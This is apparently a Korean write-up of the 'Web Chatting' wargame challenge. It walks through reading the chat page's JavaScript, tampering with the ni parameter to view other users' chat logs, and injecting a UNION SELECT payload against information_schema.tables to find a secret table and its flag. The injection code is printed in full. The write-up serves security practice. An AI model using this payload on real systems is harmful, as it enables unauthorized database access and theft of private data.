Wargame ) Web Chatting

function getchatlog(type){
  xmlhttp = new XMLHttpRequest();
  if(type==0){xmlhttp.onreadystatechange=getni;xmlhttp.open("GET","chatlog.php?t=1");
  }else if(type==1){xmlhttp.onreadystatechange=chatprint;xmlhttp.open("GET","chatview.php?t=1&ni="+ni + " union select 1,table_name,3,4,5 from information_schema.tables--");}
  xmlhttp.send(null);
 }

간단한 SQL Injection 이란다. 그리고 트래픽을 줄이기 위해 할 수 있는게 무엇이 있는지 물어보는 것 같다. on developer's perspective.

 

ID 를 입력한 후에 채팅 서비스로 연결이 된다. 이곳에서 어떤 SQL 취약점을 발견할 수는 없었다. db table 에 관해서 어떤 정보도 없었기 때문이다. 로그인 한 후 채팅서비스에 접근하도록 하겠다.

 

이런 UI에 역시 단순한 Injection 은 실행되지 않았다. 개발자 모드로 소스를 살펴보니 다음과 같은 JS 가 보였다,

<style>
 textarea {padding-left:10px; font-size:15px; font-family:verdana;}
 body {background-color:#aaa;}
</style>
<script src="./blueh4g_js.js"></script>
<script>
 var xmlhttp,ni,iq=0,brtype=1;
 function getchatlog(type){
  xmlhttp = new XMLHttpRequest();
  if(type==1){xmlhttp.onreadystatechange=getni;xmlhttp.open("GET","chatlog.php?t=1");
  }else if(type==2){xmlhttp.onreadystatechange=chatprint;xmlhttp.open("GET","chatview.php?t=1&ni="+ni);}
  xmlhttp.send(null);
 }
 function chatprint(){
  if(xmlhttp.readyState==4 && xmlhttp.status==200){
   var temp=xmlhttp.responseText;
   if(brtype==2){cwifr.document.body.innerHTML+=temp;}else{cwifr.document.write(temp);}
   cwifr.document.body.scrollTop=cwifr.document.body.scrollHeight;
  }
 }
 function getni(){
  if(xmlhttp.readyState==4 && xmlhttp.status==200){
   var tni=parseInt(xmlhttp.responseText);
   if(tni!=ni && iq!=0){getchatlog(2);}
   ni=tni;iq=1;
  }
 }
 function sayf(f){
  var xmlhttp2 = new XMLHttpRequest();
  var pdata="chatlog.php?"+encodeURI("data="+f.saydata.value);
  xmlhttp2.open("GET",pdata);
  xmlhttp2.send(null);
  f.saydata.value="";
  f.saydata.focus();
  return false;
 }
 function init(){
  cwifr = document.getElementById("ifr").contentWindow;
  cwifr.document.body.style.backgroundColor="fff";
// cwifr.document.designMode="on";
  var temp=get_br_blue();
  if(temp=="CHR" || temp=="SAF"){brtype=2;}
  getchatlog(1);
  setInterval("getchatlog(1)",1000);
  document.getElementById("firstf").focus();
 }
</script>
<body onload="init();" style="text-align:center;">
<form method="post" action="chatlog.php" onsubmit="return sayf(this);">
<table align=center>
<tr><td>
<h3>[ BlueCHAT v0.9 ] - <span style="font-size:60%;">워게임용 채팅이라 데이터 리프레쉬는 좀 느리게 해뒀습니다~</span></h3>
<iframe id="ifr" style="width:850px; height:500px;"></iframe>
</td></tr>
<tr><td align=center><input type="text" style="width:120px; text-align:center; font-weight:bold;" value="ㅇㄹ" readonly><input type="text" name="saydata" style="width:500px" id="firstf"><input type="submit" value="say">&nbsp;&nbsp;&nbsp;<span style="font-size:9px; color:#000;">made by BlueH4G</span><input type="button" value="logout" onclick="window.location='./';"></td></tr>
</table>
</form>
</body>

 

그리고 네트워크에는 지속적으로 

chatlog.php 를 가져오고 있었다. 어떤 쿼리문을 통해 이런 php 가 가져와지는 것 같다.

 

JS 에 있는 소스를 살펴보도록 하겠다.

 

getchatlog 라는 함수에 GET 방식으로 t 변수에 1 을 넣어 chatlog 를 요청하는 것을 볼 수 있다. 그리고 getchatlog 의 인자인 type 이 2 라면 GET 방식으로 chatview.php 라는 php 를 t=1 변수 그리고 ni 라는 어떤 변수를 사용하여 요청하는 것을 볼 수 있다. Burpsuite 를 이용해서 패킷을 살펴보도록 하겠다.

 

아까 보았던 php 요청 패킷이다. type 변수를 1에서 2로 바꿔서 요청할 필요가 있을것같다.

 

해당 함수를 콘솔로 수정하여 type 1 일때 chatview 를 요청하도록 수정하겠다.

 function getchatlog(type){
  xmlhttp = new XMLHttpRequest();
  if(type==0){xmlhttp.onreadystatechange=getni;xmlhttp.open("GET","chatlog.php?t=1");
  }else if(type==1){xmlhttp.onreadystatechange=chatprint;xmlhttp.open("GET","chatview.php?t=1&ni="+ni);}
  xmlhttp.send(null);
 }

이렇게 수정하면 패킷에서 

 

chatview 를 요청한 것을 볼 수 있다. 그리고 ni 라는 값은 55940 임을 알 수 있다. 하지만 패킷에 어떤 변수만 바뀌었을 뿐, UI 에 눈에 띄는 변화는 보이지 않았다. 

 

채팅을 입력해보겠다.

 

chatview.php 는 채팅기록을 보여주는 듯 하다. 그 외에는 어떤 다른것이 보이진 않았다. 페이지 소스를 다시한번 살펴보아야겠다. 페이지 소스에도 '55940' 이라는 값 말고는 다른것이 없다. 그렇다 55940 은 패킷에서 요청하던 ni 변수의 값이다. 

 

그리고 내가 입력했던 값이 계속 load 되고 있는거로 보아, ni 값이 나의 채팅 내역에 관해서 어떤 정보를 가지고 있는 것 처럼 보인다. 

ni 를 조작하여 보내보도록 하겠다.

 

55940 -> 55941 로 바꾸었다.

 

마지막으로 입력했던 채팅이 여러개 보여진다. 계속 바꾸어보겠다.

 

TEST 라는 새로운 문자를 채팅 서버에 보내고 ni 를 55940 -> 55939 로 바꾸었더니

다른 사람의 채팅이 보여진다. ni 는 user 의 id 같은 역할을 했을 것이다.

 

그렇다면 해당 쿼리는 select <채팅내역 > from < table name > where ni = 55940 ; 이런식이 될 것이다.  그렇다면 ni 값을 조작함으로써 다른 유저의 채팅 로그를 가져왔으니 '취약한 인증' 에 해당하는 취약점이 발생했다. 그리고 이 ni 변수를 이용하여 인젝션을 시도해보겠다.

 

쿼리를 보내보겠다.

 

packet 을 이용해서는 안되길래 그냥 함수를 고쳐서 브라우저 알아서 인코딩하도록 했다.

 

function getchatlog(type){
  xmlhttp = new XMLHttpRequest();
  if(type==0){xmlhttp.onreadystatechange=getni;xmlhttp.open("GET","chatlog.php?t=1");
  }else if(type==1){xmlhttp.onreadystatechange=chatprint;xmlhttp.open
  ("GET","chatview.php?t=1&ni="+ni + " union select 1,table_name,3,4,5 from information_schema.tables--");}
  xmlhttp.send(null);
 }

 

이렇게 함수를 수정해서 보냈더니

 



이런 테이블들이 나왔다.

 

secret 이라고 하면 괜히 보고싶어진다. 사실 저게 제일 수상하다. select 문을 다시 수정해서 chat_log_secret 을 조회해보겠다.

해당 테이블을 조회하여, 직접 접근했더니 플래그가 나왔다.

 

 

이 문제를 푸는데 테이블과 컬럼 정보를 가져오는데 오버헤드가 너무 심해서 type 을 강제로 바꿔서 chatview 에 접근하는것은 추천하지 않는다...